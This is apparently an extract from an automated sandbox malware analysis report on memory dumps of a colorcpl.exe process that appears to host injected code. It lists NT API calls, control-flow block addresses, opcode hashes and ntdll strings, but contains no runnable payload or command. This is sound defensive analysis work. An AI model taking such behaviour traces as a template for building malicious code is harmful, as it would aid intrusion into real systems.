                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: 898637ef7c7260304275813e627a98256f723e5e551bdf8928c2c01671a4a615
                                                                                                    • Instruction ID: 62c14862fd30614fcbc41cb59fee5c7e2af92eb542a52f1f794d7b01ae7fa2a3
                                                                                                    • Opcode Fuzzy Hash: 898637ef7c7260304275813e627a98256f723e5e551bdf8928c2c01671a4a615
                                                                                                    • Instruction Fuzzy Hash: 4C0171B6210208ABDB14DF98DC84EEB77ADEF88754F104559FA5C97201C534E914C7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 218 68ca3cb-68ca3cc 219 68ca43c-68ca449 218->219 220 68ca3ce-68ca419 call 68caf20 NtReadFile 218->220 220->219
                                                                                                    APIs
                                                                                                    • NtReadFile.NTDLL(068C4D62,5EB65239,FFFFFFFF,068C4A21,?,?,068C4D62,?,068C4A21,FFFFFFFF,5EB65239,068C4D62,?,00000000), ref: 068CA415
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 60b9bf0d8b25dd819aabfe3d7b5e2df0584732c14aaf24a02217d2e8f2f51bc0
                                                                                                    • Instruction ID: 660776de92d15987375739f4e581f77e5095d4050c3da2b4199ec0ad50ac465a
                                                                                                    • Opcode Fuzzy Hash: 60b9bf0d8b25dd819aabfe3d7b5e2df0584732c14aaf24a02217d2e8f2f51bc0
                                                                                                    • Instruction Fuzzy Hash: 5801E4B6200108AFCB18DF98DC84DEB77A9EF8C364F168249FA5DD7251D630E9118BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 224 68ca320-68ca371 call 68caf20 NtCreateFile
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,068B9CE3,?,068C4BA7,068B9CE3,FFFFFFFF,?,?,FFFFFFFF,068B9CE3,068C4BA7,?,068B9CE3,00000060,00000000,00000000), ref: 068CA36D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                    • Instruction ID: a5a498371414b9fb76d347114fd0aa86b32175f79629b54fda3147a588b6ee07
                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                    • Instruction Fuzzy Hash: AFF0BDB2210208AFCB48CF88DC84EEB77ADAF8C754F158248BA1D97240C630E8118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 228 68ca322-68ca336 229 68ca33c-68ca371 NtCreateFile 228->229 230 68ca337 call 68caf20 228->230 230->229
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,068B9CE3,?,068C4BA7,068B9CE3,FFFFFFFF,?,?,FFFFFFFF,068B9CE3,068C4BA7,?,068B9CE3,00000060,00000000,00000000), ref: 068CA36D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
                                                                                                    • Instruction ID: 277013b9516007b8060371f4f2946f73513a5f3fbd1a4473af8d8d2eded39b9a
                                                                                                    • Opcode Fuzzy Hash: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
                                                                                                    • Instruction Fuzzy Hash: BFF07AB2211108AFCB48CF98DC94EEB77A9AF8C754F158248FA1DE7240D630E851CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 232 68ca3d0-68ca3e6 233 68ca3ec-68ca419 NtReadFile 232->233 234 68ca3e7 call 68caf20 232->234 235 68ca43c-68ca449 233->235 234->233
                                                                                                    APIs
                                                                                                    • NtReadFile.NTDLL(068C4D62,5EB65239,FFFFFFFF,068C4A21,?,?,068C4D62,?,068C4A21,FFFFFFFF,5EB65239,068C4D62,?,00000000), ref: 068CA415
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                    • Instruction ID: bf2657d175ab1ee0ec50b34b97c45c070d900114d1b50623f739481fc5b23299
                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                    • Instruction Fuzzy Hash: 24F0A4B2210208AFCB18DF89DC80EEB77ADAF8C754F158248BA1D97241D630E8118BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 237 68ca373-68ca374 238 68ca349-68ca371 NtCreateFile 237->238 239 68ca376-68ca37d 237->239 240 68ca37f 239->240 241 68ca315-68ca319 239->241
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,068B9CE3,?,068C4BA7,068B9CE3,FFFFFFFF,?,?,FFFFFFFF,068B9CE3,068C4BA7,?,068B9CE3,00000060,00000000,00000000), ref: 068CA36D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: c9fc46358d2c376686e9dfda9f2929a5e029bee3152b92d67e3f90868ff24a53
                                                                                                    • Instruction ID: cf8f5aa4f610f694ef1bc52ea21883f220c613854e2c20ca4d22613ff4e02685
                                                                                                    • Opcode Fuzzy Hash: c9fc46358d2c376686e9dfda9f2929a5e029bee3152b92d67e3f90868ff24a53
                                                                                                    • Instruction Fuzzy Hash: 34F0ACB2208119AF8B48CED8EC90CEF77EDAB8C724714860DF60CC3240D631E8518BA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 243 68ca4fa-68ca53d call 68caf20 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,068CB0F4,?,00000000,?,00003000,00000040,00000000,00000000,068B9CE3), ref: 068CA539
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 246 68ca500-68ca516 247 68ca51c-68ca53d NtAllocateVirtualMemory 246->247 248 68ca517 call 68caf20 246->248 248->247
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,068CB0F4,?,00000000,?,00003000,00000040,00000000,00000000,068B9CE3), ref: 068CA539
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(068C4D40,?,?,068C4D40,068B9CE3,FFFFFFFF), ref: 068CA475
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not included in this extraction; legend: Executed / Not Executed)
• Blocks: 68b8310-68b835a (calls 68cbe20, 68cc9c0, 68bace0, 68c4e40); 68b835c-68b836e (PostThreadMessageW); 68b8370-68b838a (call 68ba470); 68b838d; 68b838e-68b8392
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 068B836A
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not included in this extraction; legend: Executed / Not Executed)
• Blocks: 68ca630-68ca646; 68ca647 (call 68caf20); 68ca64c-68ca661 (RtlFreeHeap)
APIs
• RtlFreeHeap.NTDLL(00000060,068B9CE3,?,?,068B9CE3,00000060,00000000,00000000,?,?,068B9CE3,?,00000000), ref: 068CA65D
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not included in this extraction; legend: Executed / Not Executed)
• Blocks: 68ca790-68ca7c4 (call 68caf20, LookupPrivilegeValueW)
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,068BF1C2,068BF1C2,0000003C,00000000,?,068B9D55), ref: 068CA7C0
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not included in this extraction; legend: Executed / Not Executed)
• Blocks: 68ca5f0-68ca621 (call 68caf20, RtlAllocateHeap)
APIs
• RtlAllocateHeap.NTDLL(068C4526,?,068C4C9F,068C4C9F,?,068C4526,?,?,?,?,?,00000000,068B9CE3,?), ref: 068CA61D
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not included in this extraction; legend: Executed / Not Executed)
• Blocks: 68ca623-68ca647 (call 68caf20); 68ca64c-68ca661 (RtlFreeHeap)
APIs
• RtlFreeHeap.NTDLL(00000060,068B9CE3,?,?,068B9CE3,00000060,00000000,00000000,?,?,068B9CE3,?,00000000), ref: 068CA65D
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 068CA698
Memory Dump Source
• Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID:
• String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
• API String ID: 0-2897834094
                                                                                                    • Opcode ID: f227d808b27bdca2a9dae733562b780faa08d64ac3ccddb57ae3189d8862c746
                                                                                                    • Instruction ID: 924a3df53758d45a9ee92a725bc21100a689a86f27e9df1735fb1e08ab3ae6fd
                                                                                                    • Opcode Fuzzy Hash: f227d808b27bdca2a9dae733562b780faa08d64ac3ccddb57ae3189d8862c746
                                                                                                    • Instruction Fuzzy Hash: C161AEB69131D3EFD201DF55D984E5077F5EB0A720BCA47AAE8015FB92C634ACC09E45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1E6D5FE1
                                                                                                    • @, xrefs: 1E6D647A
                                                                                                    • Control Panel\Desktop, xrefs: 1E6D615E
                                                                                                    • LanguageConfigurationPending, xrefs: 1E6D6221
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 1E6D635D
                                                                                                    • PreferredUILanguagesPending, xrefs: 1E6D61D2
                                                                                                    • LanguageConfiguration, xrefs: 1E6D6420
                                                                                                    • PreferredUILanguages, xrefs: 1E6D63D1
                                                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 1E6D5A84
                                                                                                    • @, xrefs: 1E6D61B0
                                                                                                    • @, xrefs: 1E6D6027
                                                                                                    • InstallLanguageFallback, xrefs: 1E6D6050
                                                                                                    • @, xrefs: 1E6D63A0
                                                                                                    • @, xrefs: 1E6D6277
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                    • API String ID: 0-1325123933
                                                                                                    • Opcode ID: d2e7d42d81cab582a5698391366c66602756b3d108aabd76e2265538ac15b6e1
                                                                                                    • Instruction ID: 50ce636c0ddef9cb9054505f316e9bbf7c58d4a941c578405be85f3ae743bdb8
                                                                                                    • Opcode Fuzzy Hash: d2e7d42d81cab582a5698391366c66602756b3d108aabd76e2265538ac15b6e1
                                                                                                    • Instruction Fuzzy Hash: 577239759083819BD311CF29C850BABB7E9BF88714FC04A2EF9D5D7250EB34D8498B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                    • API String ID: 0-2224505338
                                                                                                    • Opcode ID: 74d53fa2ec2a2c7872958d48c4d43e6b80a9abf2486745cae6cf9db6557c7ae7
                                                                                                    • Instruction ID: 6c4530329abfe68f0aec782544ac847c9005760f7c697d1b1272a022bd06c4a5
                                                                                                    • Opcode Fuzzy Hash: 74d53fa2ec2a2c7872958d48c4d43e6b80a9abf2486745cae6cf9db6557c7ae7
                                                                                                    • Instruction Fuzzy Hash: B751AE36A12296EFC711CF94C8A4E9AB7E5FF0AB24FD88725E4419F251C670ACC4CE14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                    • API String ID: 0-3127649145
                                                                                                    • Opcode ID: 7398ded717a75cf6bf430eb36ad90eeb51f0c9a927fd86045c4970ee9d7b0837
                                                                                                    • Instruction ID: d6faad4d862cac2c20dcb27abc37edbc968ea9e88c07715424e22669c59f88e7
                                                                                                    • Opcode Fuzzy Hash: 7398ded717a75cf6bf430eb36ad90eeb51f0c9a927fd86045c4970ee9d7b0837
                                                                                                    • Instruction Fuzzy Hash: 8E326A74E017199BDB61CF25CC88B9AB7F9FF48304F9046EAD509A7250EB71AA84CF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                    • API String ID: 0-3393094623
                                                                                                    • Opcode ID: af1ff19cd8b47a5c654dc63671f7c2c2942d666374ac1c92f47ff4f950a63443
                                                                                                    • Instruction ID: f8e9d36a766570df53da6a6966a72276233961cd186f8a3cf9e79368501e6b4d
                                                                                                    • Opcode Fuzzy Hash: af1ff19cd8b47a5c654dc63671f7c2c2942d666374ac1c92f47ff4f950a63443
                                                                                                    • Instruction Fuzzy Hash: 30028075948382CFD320CF65C090B9BB7E6BF89754FA58A1EE898C7250E774D844CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                    • API String ID: 0-3492000579
                                                                                                    • Opcode ID: 8d2ba58a9fc4a6b8d96af14d13ef10176dc0bc2ff332e5f5c4657a2bd4210efa
                                                                                                    • Instruction ID: e66b4ed93a96d63fb0b2e9a747e4dd1f120d7031e7d992c86c068e7922c3bb45
                                                                                                    • Opcode Fuzzy Hash: 8d2ba58a9fc4a6b8d96af14d13ef10176dc0bc2ff332e5f5c4657a2bd4210efa
                                                                                                    • Instruction Fuzzy Hash: E771DF35902296DFCB01CFA8C490AADFBF6FF4A304FC48659E4859B792C735A984CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                    • API String ID: 0-3224558752
